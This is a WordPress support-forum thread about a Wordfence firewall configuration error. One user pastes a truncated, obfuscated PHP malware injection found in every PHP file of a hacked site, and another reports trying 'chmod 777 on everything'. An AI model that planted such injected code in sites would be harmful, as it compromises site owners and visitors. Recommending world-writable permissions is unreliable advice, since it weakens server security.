• Hi,

    I received the following error which caused the dreaded white screen of death until I removed the wflogs/config.php file

    Error reading Wordfence Firewall config data, configuration file could be corrupted or inaccessible

    Thing is this is a live production site so i’d like to avoid it happening again. Does anyone know what caused this error? The firewall is in learning mode. PHP version 5.5.

    Thanks in advance,


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  • Same thing just happened to me. Ralphonz, did you just upgrade to php 7.0.8. I did that and that is when I started seeing the errors.

    Actually, nevermind. The error started when I upgraded wordfence (before I upgraded php).

    It is also giving me an error about not being able to require class-wp-metadata-lazyloader.php for some reason. It’s still there… Neither file has changed, nor their permissions.

    I’m having the same issue:

    Error reading config data, configuration file could be corrupted. Click here to rebuild the configuration file.

    Click the rebuild and nothing happens.

    PHP 5.5.35
    WP 4.5.3

    Tried a complete reinstall, manually rebuilding the configs from backups, chmod 777 on everything nothing seems to work.

    Anyone figured this out?


    Hello dglatiotis,
    if you just delete the whole “wflogs” folder and refresh your page what happens then?

    I’m having same issue with version: 6.2.0
    and webserver: nginx/1.6.2

    Should I post into the bug sections ?

    I have just updated to 4.8 and lost all of my site. I used FTP and found every php file is corrupted with the following:

    <?php $mqywxkoxmv = ‘]452]88]5]48]32M3]317]445]212]445]43]3)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,g)!gj<*#k#)usbutcpV x7f x7f x7 x75 156 x63 164 x69 157 x6e"; function uqzarwo($n){return chr(ord(pz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]DQtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427pmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d8165]y72]254]y76#<!%w:!>!(%w:!>! xf)fepdof57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT%2^,%b:<!%c:>%s: x5c%j:^<!%w x5c^>E5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+o*<%nfd>%fdy<Cb*[%h!>!%**#57]38y]47]67y]37]88y]27]28y]#/r%/hw:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%zy]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bu41 x72 164″) && (!isset($GLOBALS[” x61 156 x75 156 x61″])))) { $GL!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x24b!%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%),Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6Mjt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!

    and more…

    This have nothing to do with upgrading to 4.8,
    your site have been hacked.

    Delete wp-admin, wp-includes, and all php files in the root folder except “wp-config.php”, and copy into FTP 4.8 again.

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